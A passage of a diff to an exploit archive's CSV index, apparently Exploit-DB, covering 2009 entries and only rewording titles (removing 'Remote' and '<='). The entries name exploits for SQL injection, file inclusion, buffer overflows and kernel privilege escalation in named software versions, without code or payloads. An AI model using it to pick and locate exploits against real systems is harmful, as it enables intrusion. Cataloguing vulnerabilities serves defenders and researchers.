8836,platforms/php/webapps/8836.txt,"OCS Inventory NG 1.02 - Multiple SQL Injection Vulnerabilities",2009-06-01,"Nico Leidecker",php,webapps,0 8837,platforms/windows/dos/8837.txt,"AIMP 2.51 build 330 - (ID3v1/ID3v2 Tag) Remote Stack BoF PoC (SEH)",2009-06-01,LiquidWorm,windows,dos,0 8838,platforms/php/webapps/8838.txt,"elitecms 1.01 - (SQL/XSS) Multiple Vulnerabilities",2009-06-01,xeno_hive,php,webapps,0 -8839,platforms/php/webapps/8839.txt,"Open-school 1.0 - (id) Remote SQL Injection",2009-06-01,OzX,php,webapps,0 +8839,platforms/php/webapps/8839.txt,"Open-school 1.0 - (id) SQL Injection",2009-06-01,OzX,php,webapps,0 8840,platforms/php/webapps/8840.txt,"Escon SupportPortal Pro 3.0 - (tid) Blind SQL Injection",2009-06-01,OzX,php,webapps,0 8841,platforms/php/webapps/8841.txt,"unclassified newsboard 1.6.4 - Multiple Vulnerabilities",2009-06-01,girex,php,webapps,0 8842,platforms/multiple/dos/8842.pl,"Apache mod_dav / svn Remote Denial of Service Exploit",2009-06-01,kingcope,multiple,dos,0 @@ -8355,16 +8355,16 @@ id,file,description,date,author,platform,type,port 8857,platforms/php/webapps/8857.txt,"WebCal (webCal3_detail.asp event_id) SQL Injection",2009-06-02,Bl@ckbe@rD,php,webapps,0 8858,platforms/php/webapps/8858.txt,"propertymax pro free - (SQL/XSS) Multiple Vulnerabilities",2009-06-02,SirGod,php,webapps,0 8859,platforms/asp/webapps/8859.txt,"WebEyes Guest Book 3 - (yorum.asp mesajid) SQL Injection",2009-06-02,Bl@ckbe@rD,asp,webapps,0 -8860,platforms/php/webapps/8860.txt,"podcast generator <= 1.2 - globals[] Multiple Vulnerabilities",2009-06-02,StAkeR,php,webapps,0 +8860,platforms/php/webapps/8860.txt,"podcast generator 1.2 - globals[] Multiple Vulnerabilities",2009-06-02,StAkeR,php,webapps,0 8861,platforms/osx/remote/8861.rb,"Apple iTunes 8.1.1 - (ITMS) Multiple Protocol Handler BoF Exploit (Metasploit)",2009-06-03,"Will Drewry",osx,remote,0 8862,platforms/windows/dos/8862.txt,"Apple QuickTime Image Description Atom Sign Extension PoC",2009-06-03,webDEViL,windows,dos,0 8863,platforms/windows/local/8863.c,"Atomix Virtual Dj Pro 6.0 - Stack Buffer Overflow PoC (SEH)",2009-06-03,"fl0 fl0w",windows,local,0 -8864,platforms/php/webapps/8864.txt,"My Mini Bill (orderid) Remote SQL Injection",2009-06-03,"ThE g0bL!N",php,webapps,0 -8865,platforms/php/webapps/8865.txt,"EgyPlus 7ml <= 1.0.1 - (Auth Bypass) SQL Injection",2009-06-03,Qabandi,php,webapps,0 -8866,platforms/php/webapps/8866.php,"Podcast Generator <= 1.2 unauthorized Re-Installation Remote Exploit",2009-06-03,StAkeR,php,webapps,0 +8864,platforms/php/webapps/8864.txt,"My Mini Bill (orderid) SQL Injection",2009-06-03,"ThE g0bL!N",php,webapps,0 +8865,platforms/php/webapps/8865.txt,"EgyPlus 7ml 1.0.1 - (Auth Bypass) SQL Injection",2009-06-03,Qabandi,php,webapps,0 +8866,platforms/php/webapps/8866.php,"Podcast Generator 1.2 unauthorized Re-Installation Remote Exploit",2009-06-03,StAkeR,php,webapps,0 8867,platforms/php/webapps/8867.pl,"Joomla Component Seminar 1.28 - (id) Blind SQL Injection Exploit",2009-06-03,"ThE g0bL!N",php,webapps,0 8868,platforms/php/webapps/8868.txt,"OCS Inventory NG 1.02 - Remote File Disclosure",2009-06-03,"Nico Leidecker",php,webapps,0 -8869,platforms/php/webapps/8869.txt,"Supernews 2.6 - (index.php noticia) Remote SQL Injection",2009-06-03,DD3str0y3r,php,webapps,0 +8869,platforms/php/webapps/8869.txt,"Supernews 2.6 - (index.php noticia) SQL Injection",2009-06-03,DD3str0y3r,php,webapps,0 8870,platforms/php/webapps/8870.txt,"Joomla Omilen Photo Gallery 0.5b - Local File Inclusion",2009-06-03,ByALBAYX,php,webapps,0 8871,platforms/php/webapps/8871.txt,"Movie PHP Script 2.0 - (init.php anticode) Code Execution",2009-06-03,SirGod,php,webapps,0 8872,platforms/php/webapps/8872.txt,"Joomla Component com_mosres Multiple SQL Injection Vulnerabilities",2009-06-03,"Chip d3 bi0s",php,webapps,0 @@ -8376,9 +8376,9 @@ id,file,description,date,author,platform,type,port 8878,platforms/php/webapps/8878.txt,"Web Directory PRO - Remote Database Backup",2009-06-04,TiGeR-Dz,php,webapps,0 8879,platforms/php/webapps/8879.htm,"Host Directory PRO 2.1.0 - Remote Change Admin Password Exploit",2009-06-04,TiGeR-Dz,php,webapps,0 8880,platforms/linux/remote/8880.txt,"kloxo 5.75 - Multiple Vulnerabilities",2009-06-04,anonymous,linux,remote,0 -8881,platforms/windows/local/8881.php,"PeaZIP <= 2.6.1 Compressed Filename Command Injection Exploit",2009-06-05,Nine:Situations:Group,windows,local,0 -8882,platforms/php/webapps/8882.txt,"Pixelactivo 3.0 - (idx) Remote SQL Injection",2009-06-05,snakespc,php,webapps,0 -8883,platforms/php/webapps/8883.txt,"Pixelactivo 3.0 - (Auth Bypass) Remote SQL Injection",2009-06-05,"ThE g0bL!N",php,webapps,0 +8881,platforms/windows/local/8881.php,"PeaZIP 2.6.1 Compressed Filename Command Injection Exploit",2009-06-05,Nine:Situations:Group,windows,local,0 +8882,platforms/php/webapps/8882.txt,"Pixelactivo 3.0 - (idx) SQL Injection",2009-06-05,snakespc,php,webapps,0 +8883,platforms/php/webapps/8883.txt,"Pixelactivo 3.0 - (Auth Bypass) SQL Injection",2009-06-05,"ThE g0bL!N",php,webapps,0 8884,platforms/php/webapps/8884.txt,"Kjtechforce mailman b1 - (code) SQL Injection Delete Row",2009-06-05,YEnH4ckEr,php,webapps,0 8885,platforms/php/webapps/8885.pl,"Kjtechforce mailman b1 - (dest) Remote Blind SQL Injection Exploit",2009-06-05,YEnH4ckEr,php,webapps,0 8886,platforms/php/webapps/8886.txt,"MyCars Automotive (Auth Bypass) SQL Injection",2009-06-08,snakespc,php,webapps,0 @@ -8386,56 +8386,56 @@ id,file,description,date,author,platform,type,port 8890,platforms/asp/webapps/8890.txt,"fipsCMS Light 2.1 - (db.mdb) Remote Database Disclosure",2009-06-08,ByALBAYX,asp,webapps,0 8891,platforms/php/webapps/8891.txt,"Joomla Component com_school 1.4 - (classid) SQL Injection",2009-06-08,"Chip d3 bi0s",php,webapps,0 8892,platforms/php/webapps/8892.txt,"Virtue Classifieds (category) SQL Injection",2009-06-08,OzX,php,webapps,0 -8893,platforms/php/webapps/8893.txt,"Virtue Book Store (cid) Remote SQL Injection",2009-06-08,OzX,php,webapps,0 -8894,platforms/php/webapps/8894.txt,"Virtue Shopping Mall (cid) Remote SQL Injection",2009-06-08,OzX,php,webapps,0 +8893,platforms/php/webapps/8893.txt,"Virtue Book Store (cid) SQL Injection",2009-06-08,OzX,php,webapps,0 +8894,platforms/php/webapps/8894.txt,"Virtue Shopping Mall (cid) SQL Injection",2009-06-08,OzX,php,webapps,0 8895,platforms/cgi/webapps/8895.txt,"Interlogy Profile Manager Basic Insecure Cookie Handling",2009-06-08,ZoRLu,cgi,webapps,0 -8896,platforms/osx/local/8896.c,"Apple MACOS X xnu <= 1228.9.59 - Local Kernel Root Exploit",2009-06-08,mu-b,osx,local,0 -8897,platforms/windows/remote/8897.c,"httpdx <= 0.8 FTP Server Delete/Get/Create Directories/Files Exploit",2009-06-08,"Jonathan Salwan",windows,remote,0 +8896,platforms/osx/local/8896.c,"Apple MACOS X xnu 1228.9.59 - Local Kernel Root Exploit",2009-06-08,mu-b,osx,local,0 +8897,platforms/windows/remote/8897.c,"httpdx 0.8 FTP Server Delete/Get/Create Directories/Files Exploit",2009-06-08,"Jonathan Salwan",windows,remote,0 8898,platforms/php/webapps/8898.txt,"Joomla Component MooFAQ (com_moofaq) LFI",2009-06-08,"Chip d3 bi0s",php,webapps,0 8899,platforms/windows/dos/8899.txt,"SAP GUI 6.4 - ActiveX (Accept) Remote Buffer Overflow PoC",2009-06-08,DSecRG,windows,dos,0 -8900,platforms/php/webapps/8900.txt,"Frontis 3.9.01.24 - (source_class) Remote SQL Injection",2009-06-08,snakespc,php,webapps,0 +8900,platforms/php/webapps/8900.txt,"Frontis 3.9.01.24 - (source_class) SQL Injection",2009-06-08,snakespc,php,webapps,0 8901,platforms/php/webapps/8901.txt,"virtue news - (SQL/XSS) Multiple Vulnerabilities",2009-06-08,snakespc,php,webapps,0 8902,platforms/php/webapps/8902.htm,"Grestul 1.2 - Remote Add Administrator Account Exploit",2009-06-08,"ThE g0bL!N",php,webapps,0 8903,platforms/php/webapps/8903.txt,"DM FileManager 3.9.2 Insecure Cookie Handling",2009-06-08,"ThE g0bL!N",php,webapps,0 8904,platforms/php/webapps/8904.txt,"automated link exchange portal 1.3 - Multiple Vulnerabilities",2009-06-08,TiGeR-Dz,php,webapps,0 8905,platforms/php/webapps/8905.txt,"Joomla Component com_portafolio (cid) SQL Injection",2009-06-08,"Chip d3 bi0s",php,webapps,0 -8906,platforms/php/webapps/8906.pl,"Shop Script Pro 2.12 - Remote SQL Injection Exploit",2009-06-08,Ams,php,webapps,0 -8907,platforms/multiple/remote/8907.txt,"Apple Safari <= 3.2.x - (XXE attack) Local File Theft",2009-06-09,"Chris Evans",multiple,remote,0 +8906,platforms/php/webapps/8906.pl,"Shop Script Pro 2.12 - SQL Injection Exploit",2009-06-08,Ams,php,webapps,0 +8907,platforms/multiple/remote/8907.txt,"Apple Safari 3.2.x - (XXE attack) Local File Theft",2009-06-09,"Chris Evans",multiple,remote,0 8908,platforms/php/webapps/8908.txt,"Joomla Component BookLibrary 1.5.2.4 - Remote File Inclusion",2009-06-09,"Mehmet Ince",php,webapps,0 8911,platforms/php/webapps/8911.txt,"Joomla Component Akobook 2.3 - (gbid) SQL Injection",2009-06-09,Ab1i,php,webapps,0 -8912,platforms/php/webapps/8912.txt,"Joomla Component com_media_library 1.5.3 - RFI",2009-06-09,"Mehmet Ince",php,webapps,0 -8913,platforms/php/webapps/8913.txt,"S-CMS <= 2.0b3 - Multiple Local File Inclusion Vulnerabilities",2009-06-09,YEnH4ckEr,php,webapps,0 -8914,platforms/php/webapps/8914.txt,"S-CMS <= 2.0b3 - Multiple SQL Injection Vulnerabilities",2009-06-09,YEnH4ckEr,php,webapps,0 -8915,platforms/php/webapps/8915.pl,"S-CMS <= 2.0b3 - (username) Blind SQL Injection Exploit",2009-06-09,YEnH4ckEr,php,webapps,0 +8912,platforms/php/webapps/8912.txt,"Joomla Component com_media_library 1.5.3 - Remote File Inclusion",2009-06-09,"Mehmet Ince",php,webapps,0 +8913,platforms/php/webapps/8913.txt,"S-CMS 2.0b3 - Multiple Local File Inclusion Vulnerabilities",2009-06-09,YEnH4ckEr,php,webapps,0 +8914,platforms/php/webapps/8914.txt,"S-CMS 2.0b3 - Multiple SQL Injection Vulnerabilities",2009-06-09,YEnH4ckEr,php,webapps,0 +8915,platforms/php/webapps/8915.pl,"S-CMS 2.0b3 - (username) Blind SQL Injection Exploit",2009-06-09,YEnH4ckEr,php,webapps,0 8916,platforms/windows/remote/8916.py,"Free Download Manager 2.5/3.0 - (Control Server) Remote BoF Exploit",2009-06-09,His0k4,windows,remote,80 8917,platforms/php/webapps/8917.txt,"mrcgiguy the ticket system 2.0 php - Multiple Vulnerabilities",2009-06-09,"ThE g0bL!N",php,webapps,0 -8918,platforms/php/webapps/8918.txt,"MRCGIGUY Hot Links (report.php id) Remote SQL Injection",2009-06-09,"ThE g0bL!N",php,webapps,0 -8919,platforms/php/webapps/8919.txt,"Joomla Component com_realestatemanager 1.0 - RFI",2009-06-09,"Mehmet Ince",php,webapps,0 -8920,platforms/php/webapps/8920.txt,"Joomla Component com_vehiclemanager 1.0 - RFI",2009-06-09,"Mehmet Ince",php,webapps,0 +8918,platforms/php/webapps/8918.txt,"MRCGIGUY Hot Links (report.php id) SQL Injection",2009-06-09,"ThE g0bL!N",php,webapps,0 +8919,platforms/php/webapps/8919.txt,"Joomla Component com_realestatemanager 1.0 - Remote File Inclusion",2009-06-09,"Mehmet Ince",php,webapps,0 +8920,platforms/php/webapps/8920.txt,"Joomla Component com_vehiclemanager 1.0 - Remote File Inclusion",2009-06-09,"Mehmet Ince",php,webapps,0 8921,platforms/php/webapps/8921.sh,"phpMyAdmin - '/scripts/setup.php' PHP Code Injection Exploit",2009-06-09,"Adrian ""pagvac"" Pastor",php,webapps,0 8922,platforms/windows/remote/8922.txt,"DX Studio Player < 3.0.29.1 Firefox plugin - Command Injection",2009-06-10,"Core Security",windows,remote,0 -8923,platforms/php/webapps/8923.txt,"LightNEasy sql/no-db <= 2.2.x system Config Disclosure Exploit",2009-06-10,StAkeR,php,webapps,0 +8923,platforms/php/webapps/8923.txt,"LightNEasy sql/no-db 2.2.x system Config Disclosure Exploit",2009-06-10,StAkeR,php,webapps,0 8924,platforms/php/webapps/8924.txt,"School Data Navigator (page) Local/Remote File Inclusion",2009-06-10,Br0ly,php,webapps,0 8925,platforms/php/webapps/8925.txt,"Desi Short URL Script - (Auth Bypass) Insecure Cookie Handling",2009-06-10,N@bilX,php,webapps,0 8926,platforms/php/webapps/8926.txt,"mrcgiguy freeticket - (ch/SQL) Multiple Vulnerabilities",2009-06-10,"ThE g0bL!N",php,webapps,0 8927,platforms/php/webapps/8927.pl,"Open Biller 0.1 - (username) Blind SQL Injection Exploit",2009-06-10,YEnH4ckEr,php,webapps,0 -8928,platforms/php/webapps/8928.txt,"phpWebThings <= 1.5.2 - (help.php module) Local File Inclusion",2009-06-11,Br0ly,php,webapps,0 -8929,platforms/php/webapps/8929.txt,"Splog <= 1.2 Beta - Multiple Remote SQL Injection Vulnerabilities",2009-06-11,YEnH4ckEr,php,webapps,0 -8930,platforms/windows/remote/8930.txt,"ModSecurity <= 2.5.9 (Core Rules <= 2.5-1.6.1) - Filter Bypass",2009-06-11,"Lavakumar Kuppan",windows,remote,0 +8928,platforms/php/webapps/8928.txt,"phpWebThings 1.5.2 - (help.php module) Local File Inclusion",2009-06-11,Br0ly,php,webapps,0 +8929,platforms/php/webapps/8929.txt,"Splog 1.2 Beta - Multiple SQL Injection Vulnerabilities",2009-06-11,YEnH4ckEr,php,webapps,0 +8930,platforms/windows/remote/8930.txt,"ModSecurity 2.5.9 (Core Rules 2.5-1.6.1) - Filter Bypass",2009-06-11,"Lavakumar Kuppan",windows,remote,0 8931,platforms/php/webapps/8931.txt,"TorrentVolve 1.4 - (deleteTorrent) Delete Arbitrary File",2009-06-11,Br0ly,php,webapps,0 8932,platforms/php/webapps/8932.txt,"yogurt 0.3 - (XSS/SQL Injection) Multiple Vulnerabilities",2009-06-11,Br0ly,php,webapps,0 -8933,platforms/php/webapps/8933.php,"Sniggabo CMS (article.php id) Remote SQL Injection Exploit",2009-06-11,Lidloses_Auge,php,webapps,0 +8933,platforms/php/webapps/8933.php,"Sniggabo CMS (article.php id) SQL Injection Exploit",2009-06-11,Lidloses_Auge,php,webapps,0 8934,platforms/windows/remote/8934.py,"Apple iTunes 8.1.1.10 - (itms/itcp) Remote Buffer Overflow Exploit (Windows)",2009-06-12,ryujin,windows,remote,0 8935,platforms/php/webapps/8935.txt,"Zip Store Chat 4.0/5.0 - (Auth Bypass) SQL Injection",2009-06-12,ByALBAYX,php,webapps,0 -8936,platforms/php/webapps/8936.txt,"4Images <= 1.7.7 - Filter Bypass HTML Injection/XSS",2009-06-12,Qabandi,php,webapps,0 +8936,platforms/php/webapps/8936.txt,"4Images 1.7.7 - Filter Bypass HTML Injection/XSS",2009-06-12,Qabandi,php,webapps,0 8937,platforms/php/webapps/8937.txt,"campus virtual-lms - (XSS/SQL Injection) Multiple Vulnerabilities",2009-06-12,Yasión,php,webapps,0 8938,platforms/windows/remote/8938.txt,"Green Dam 3.17 - (URL) Remote Buffer Overflow Exploit (xp/sp2)",2009-06-12,seer[N.N.U],windows,remote,0 -8939,platforms/php/webapps/8939.pl,"phpWebThings <= 1.5.2 MD5 Hash Retrieve/File Disclosure Exploit",2009-06-12,StAkeR,php,webapps,0 +8939,platforms/php/webapps/8939.pl,"phpWebThings 1.5.2 MD5 Hash Retrieve/File Disclosure Exploit",2009-06-12,StAkeR,php,webapps,0 8940,platforms/multiple/dos/8940.pl,"Asterisk IAX2 Resource Exhaustion via Attacked IAX Fuzzer",2009-06-12,"Blake Cornell",multiple,dos,0 8941,platforms/php/webapps/8941.txt,"pivot 1.40.4-7 - Multiple Vulnerabilities",2009-06-12,intern0t,php,webapps,0 8942,platforms/php/webapps/8942.txt,"tbdev 01-01-2008 - Multiple Vulnerabilities",2009-06-12,intern0t,php,webapps,0 8943,platforms/php/webapps/8943.txt,"translucid 1.75 - Multiple Vulnerabilities",2009-06-12,intern0t,php,webapps,0 -8944,platforms/php/webapps/8944.txt,"Uebimiau Web-Mail <= 3.2.0-1.8 - Remote File / Overwrite Vulnerabilities",2009-06-12,GoLd_M,php,webapps,0 +8944,platforms/php/webapps/8944.txt,"Uebimiau Web-Mail 3.2.0-1.8 - Remote File / Overwrite Vulnerabilities",2009-06-12,GoLd_M,php,webapps,0 8946,platforms/php/webapps/8946.txt,"Joomla Component com_Projectfork 2.0.10 - Local File Inclusion",2009-06-15,ByALBAYX,php,webapps,0 8947,platforms/php/webapps/8947.txt,"impleo music collection 2.0 - (SQL/XSS) Multiple Vulnerabilities",2009-06-15,SirGod,php,webapps,0 8948,platforms/php/webapps/8948.txt,"Mundi Mail 0.8.2 - (top) Remote File Inclusion",2009-06-15,Br0ly,php,webapps,0 @@ -8456,27 +8456,27 @@ id,file,description,date,author,platform,type,port 8963,platforms/hardware/remote/8963.txt,"Netgear DG632 Router Authentication Bypass",2009-06-15,"Tom Neaves",hardware,remote,0 8964,platforms/hardware/dos/8964.txt,"Netgear DG632 Router Remote Denial of Service",2009-06-15,"Tom Neaves",hardware,dos,0 8965,platforms/php/webapps/8965.txt,"vBulletin Radio and TV Player AddOn - HTML Injection",2009-06-15,d3v1l,php,webapps,0 -8966,platforms/php/webapps/8966.txt,"phportal 1 - (topicler.php id) Remote SQL Injection",2009-06-15,"Mehmet Ince",php,webapps,0 +8966,platforms/php/webapps/8966.txt,"phportal 1 - (topicler.php id) SQL Injection",2009-06-15,"Mehmet Ince",php,webapps,0 8967,platforms/php/webapps/8967.txt,"The Recipe Script 5 - Remote XSS",2009-06-15,"ThE g0bL!N",php,webapps,0 8968,platforms/php/webapps/8968.txt,"Joomla Component com_jumi (fileid) Blind SQL Injection Exploit",2009-06-15,"Chip d3 bi0s",php,webapps,0 8969,platforms/windows/remote/8969.rb,"Green Dam 3.17 URL Processing Buffer Overflow Exploit (Metasploit)",2009-06-16,Trancer,windows,remote,0 8970,platforms/windows/remote/8970.txt,"McAfee 3.6.0.608 - naPolicyManager.dll ActiveX Arbitrary Data Write",2009-06-16,callAX,windows,remote,0 8971,platforms/windows/dos/8971.pl,"Carom3D 5.06 Unicode Buffer Overrun/DoS",2009-06-16,LiquidWorm,windows,dos,0 -8974,platforms/php/webapps/8974.txt,"XOOPS <= 2.3.3 - Remote File Disclosure (.htaccess)",2009-06-16,daath,php,webapps,0 +8974,platforms/php/webapps/8974.txt,"XOOPS 2.3.3 - Remote File Disclosure (.htaccess)",2009-06-16,daath,php,webapps,0 8975,platforms/php/webapps/8975.txt,"phpFK 7.03 - (page_bottom.php) Local File Inclusion",2009-06-17,ahmadbady,php,webapps,0 8976,platforms/multiple/dos/8976.pl,"Multiple HTTP Server - Low Bandwidth Denial of Service (slowloris.pl)",2009-06-17,RSnake,multiple,dos,0 8977,platforms/php/webapps/8977.txt,"TekBase All-in-One 3.1 - Multiple SQL Injection Vulnerabilities",2009-06-17,n3wb0ss,php,webapps,0 -8978,platforms/php/webapps/8978.txt,"fuzzylime CMS <= 3.03a - Local Inclusion / Arbitrary File Corruption PoC",2009-06-17,StAkeR,php,webapps,0 +8978,platforms/php/webapps/8978.txt,"fuzzylime CMS 3.03a - Local Inclusion / Arbitrary File Corruption PoC",2009-06-17,StAkeR,php,webapps,0 8979,platforms/php/webapps/8979.txt,"FretsWeb 1.2 - Multiple Local File Inclusion Vulnerabilities",2009-06-17,YEnH4ckEr,php,webapps,0 8980,platforms/php/webapps/8980.py,"FretsWeb 1.2 - (name) Remote Blind SQL Injection Exploit",2009-06-17,YEnH4ckEr,php,webapps,0 8981,platforms/php/webapps/8981.txt,"phportal 1.0 Insecure Cookie Handling",2009-06-17,KnocKout,php,webapps,0 -8982,platforms/linux/dos/8982.txt,"compface <= 1.5.2 - (.XBM) Local Buffer Overflow PoC",2009-06-17,metalhoney,linux,dos,0 +8982,platforms/linux/dos/8982.txt,"compface 1.5.2 - (.XBM) Local Buffer Overflow PoC",2009-06-17,metalhoney,linux,dos,0 8983,platforms/windows/local/8983.c,"DESlock+ 4.0.2 - dlpcrypt.sys Local Kernel ring0 Code Execution Exploit",2009-06-18,mu-b,windows,local,0 8984,platforms/php/webapps/8984.txt,"cms buzz - (XSS/pc/hi) Multiple Vulnerabilities",2009-06-18,"ThE g0bL!N",php,webapps,0 8986,platforms/windows/remote/8986.txt,"Edraw PDF Viewer Component < 3.2.0.126 - ActiveX Insecure Method",2009-06-18,Jambalaya,windows,remote,0 8987,platforms/cgi/webapps/8987.txt,"MIDAS 1.43 - (Auth Bypass) Insecure Cookie Handling",2009-06-22,HxH,cgi,webapps,0 -8988,platforms/php/webapps/8988.txt,"pc4 Uploader <= 10.0 - Remote File Disclosure",2009-06-22,Qabandi,php,webapps,0 -8990,platforms/php/webapps/8990.txt,"phpDatingClub 3.7 - Remote SQL/XSS Injection Vulnerabilities",2009-06-22,"ThE g0bL!N",php,webapps,0 +8988,platforms/php/webapps/8988.txt,"pc4 Uploader 10.0 - Remote File Disclosure",2009-06-22,Qabandi,php,webapps,0 +8990,platforms/php/webapps/8990.txt,"phpDatingClub 3.7 - SQL/XSS Injection Vulnerabilities",2009-06-22,"ThE g0bL!N",php,webapps,0 8991,platforms/multiple/dos/8991.php,"Multiple HTTP Server - Low Bandwidth Denial of Service (2)",2009-06-22,evilrabbi,multiple,dos,0 8992,platforms/php/webapps/8992.php,"pmaPWN! - phpMyAdmin Code Injection RCE Scanner & Exploit",2009-06-22,"Hacking Expose!",php,webapps,0 8993,platforms/php/webapps/8993.txt,"elgg - (XSS/CSRF/change password) Multiple Vulnerabilities",2009-06-22,lorddemon,php,webapps,0 @@ -8484,18 +8484,18 @@ id,file,description,date,author,platform,type,port 8995,platforms/php/webapps/8995.txt,"Campsite 3.3.0 RC1 - Multiple Remote File Inclusion Vulnerabilities",2009-06-22,CraCkEr,php,webapps,0 8996,platforms/php/webapps/8996.txt,"Gravy Media Photo Host 1.0.8 - Local File Disclosure",2009-06-22,Lo$er,php,webapps,0 8997,platforms/php/webapps/8997.txt,"kasseler CMS - (fd/XSS) Multiple Vulnerabilities",2009-06-22,S(r1pt,php,webapps,0 -8998,platforms/php/webapps/8998.txt,"Sourcebans <= 1.4.2 - Arbitrary Change Admin Email",2009-06-22,"Mr. Anonymous",php,webapps,0 -8999,platforms/php/webapps/8999.txt,"Joomla Component com_tickets <= 2.1 - (id) SQL Injection",2009-06-22,"Chip d3 bi0s",php,webapps,0 -9000,platforms/php/webapps/9000.txt,"RS-CMS 2.1 - (key) Remote SQL Injection",2009-06-22,Mr.tro0oqy,php,webapps,0 -9001,platforms/php/webapps/9001.php,"MyBB <= 1.4.6 - Remote Code Execution Exploit",2009-06-22,The:Paradox,php,webapps,0 +8998,platforms/php/webapps/8998.txt,"Sourcebans 1.4.2 - Arbitrary Change Admin Email",2009-06-22,"Mr. Anonymous",php,webapps,0 +8999,platforms/php/webapps/8999.txt,"Joomla Component com_tickets 2.1 - (id) SQL Injection",2009-06-22,"Chip d3 bi0s",php,webapps,0 +9000,platforms/php/webapps/9000.txt,"RS-CMS 2.1 - (key) SQL Injection",2009-06-22,Mr.tro0oqy,php,webapps,0 +9001,platforms/php/webapps/9001.php,"MyBB 1.4.6 - Remote Code Execution Exploit",2009-06-22,The:Paradox,php,webapps,0 9002,platforms/windows/remote/9002.c,"Bopup Communications Server 3.2.26.5460 - Remote SYSTEM Exploit",2009-06-22,mu-b,windows,remote,19810 9004,platforms/php/webapps/9004.txt,"Zen Cart 1.3.8 - Remote Code Execution Exploit",2009-06-23,BlackH,php,webapps,0 -9005,platforms/php/webapps/9005.py,"Zen Cart 1.3.8 - Remote SQL Execution Exploit",2009-06-23,BlackH,php,webapps,0 +9005,platforms/php/webapps/9005.py,"Zen Cart 1.3.8 - SQL Execution Exploit",2009-06-23,BlackH,php,webapps,0 9006,platforms/windows/dos/9006.py,"HP Data Protector 4.00-SP1b43064 - Remote Memory Leak/Dos Exploit",2009-06-23,Nibin,windows,dos,0 9007,platforms/windows/dos/9007.rb,"HP Data Protector 4.00-SP1b43064 - Remote Memory Leak/Dos (Metasploit)",2009-06-23,Nibin,windows,dos,0 9008,platforms/php/webapps/9008.txt,"phpCollegeExchange 0.1.5c - (RFI/LFI/XSS) Multiple Vulnerabilities",2009-06-23,CraCkEr,php,webapps,0 -9009,platforms/php/webapps/9009.txt,"BASE <= 1.2.4 - (Auth Bypass) Insecure Cookie Handling",2009-06-24,"Tim Medin",php,webapps,0 -9010,platforms/php/webapps/9010.txt,"Glossword <= 1.8.11 - (index.php x) Local File Inclusion",2009-06-24,t0fx,php,webapps,0 +9009,platforms/php/webapps/9009.txt,"BASE 1.2.4 - (Auth Bypass) Insecure Cookie Handling",2009-06-24,"Tim Medin",php,webapps,0 +9010,platforms/php/webapps/9010.txt,"Glossword 1.8.11 - (index.php x) Local File Inclusion",2009-06-24,t0fx,php,webapps,0 9011,platforms/php/webapps/9011.txt,"Joomla Component com_pinboard Remote File Upload",2009-06-24,"ViRuSMaN ",php,webapps,0 9012,platforms/php/webapps/9012.txt,"tribiq CMS 5.0.12c - (XSS/LFI) Multiple Vulnerabilities",2009-06-24,CraCkEr,php,webapps,0 9014,platforms/php/webapps/9014.txt,"PHPEcho CMS 2.0-rc3 - (forum) XSS Cookie Stealing / Blind",2009-06-24,JosS,php,webapps,0 @@ -8508,7 +8508,7 @@ id,file,description,date,author,platform,type,port 9021,platforms/php/webapps/9021.txt,"MD-Pro 1.083.x Survey Module (pollID) Blind SQL Injection",2009-06-25,XaDoS,php,webapps,0 9022,platforms/php/webapps/9022.txt,"Virtue Online Test Generator - (AB/SQL/XSS) Multiple Vulnerabilities",2009-06-26,HxH,php,webapps,0 9023,platforms/php/webapps/9023.txt,"PHP-Address Book 4.0.x - Multiple SQL Injection Vulnerabilities",2009-06-26,YEnH4ckEr,php,webapps,0 -9024,platforms/php/webapps/9024.txt,"ForumPal FE 1.1 - (Auth Bypass) Remote SQL Injection",2009-06-26,"ThE g0bL!N",php,webapps,0 +9024,platforms/php/webapps/9024.txt,"ForumPal FE 1.1 - (Auth Bypass) SQL Injection",2009-06-26,"ThE g0bL!N",php,webapps,0 9025,platforms/php/webapps/9025.txt,"Mega File Manager 1.0 - (index.php page) LFI",2009-06-26,SirGod,php,webapps,0 9026,platforms/php/webapps/9026.txt,"WHOISCART (Auth Bypass) Information Disclosure",2009-06-29,SecurityRules,php,webapps,0 9027,platforms/php/webapps/9027.txt,"Messages Library 2.0 - (cat.php CatID) SQL Injection",2009-06-29,SecurityRules,php,webapps,0 @@ -8519,12 +8519,12 @@ id,file,description,date,author,platform,type,port 9032,platforms/php/webapps/9032.txt,"osTicket 1.6 RC4 Admin Login Blind SQL Injection",2009-06-29,"Adam Baldwin",php,webapps,0 9033,platforms/windows/dos/9033.pl,"SCMPX 1.5.1 - (.m3u) Local Heap Overflow PoC",2009-06-29,hack4love,windows,dos,0 9034,platforms/windows/local/9034.pl,"HT-MP3Player 1.0 - (.ht3) Local Buffer Overflow Exploit (SEH)",2009-06-29,hack4love,windows,local,0 -9035,platforms/php/webapps/9035.txt,"Almnzm (COOKIE: customer) Remote SQL Injection",2009-06-29,Qabandi,php,webapps,0 +9035,platforms/php/webapps/9035.txt,"Almnzm (COOKIE: customer) SQL Injection",2009-06-29,Qabandi,php,webapps,0 9036,platforms/php/webapps/9036.txt,"PHP-Sugar 0.80 - (index.php t) Local File Inclusion",2009-06-29,ahmadbady,php,webapps,0 9037,platforms/php/webapps/9037.txt,"Clicknet CMS 2.1 - (side) Arbitrary File Disclosure Vulnlerability",2009-06-29,"ThE g0bL!N",php,webapps,0 9038,platforms/windows/local/9038.py,"HT-MP3Player 1.0 - (.ht3) Universal Buffer Overflow (SEH)",2009-06-29,His0k4,windows,local,0 9039,platforms/multiple/remote/9039.txt,"Cpanel - (lastvisit.html domain) Arbitrary File Disclosure (Auth)",2009-06-29,SecurityRules,multiple,remote,0 -9040,platforms/php/webapps/9040.txt,"Joomla com_bookflip (book_id) Remote SQL Injection",2009-06-29,boom3rang,php,webapps,0 +9040,platforms/php/webapps/9040.txt,"Joomla com_bookflip (book_id) SQL Injection",2009-06-29,boom3rang,php,webapps,0 9041,platforms/php/webapps/9041.txt,"Audio Article Directory (file) Remote File Disclosure",2009-06-29,"ThE g0bL!N",php,webapps,0 9042,platforms/php/webapps/9042.pl,"Newsolved 1.1.6 - (login grabber) Multiple SQL Injection Exploit",2009-06-29,jmp-esp,php,webapps,0 9043,platforms/php/webapps/9043.txt,"WordPress Plugin DM Albums 1.9.2 - Remote File Inclusion",2009-06-29,Septemb0x,php,webapps,0 @@ -8537,10 +8537,10 @@ id,file,description,date,author,platform,type,port 9052,platforms/php/webapps/9052.txt,"BIGACE CMS 2.6 - (cmd) Local File Inclusion",2009-06-30,CWD@rBe,php,webapps,0 9053,platforms/php/webapps/9053.txt,"phpMyBlockchecker 1.0.0055 Insecure Cookie 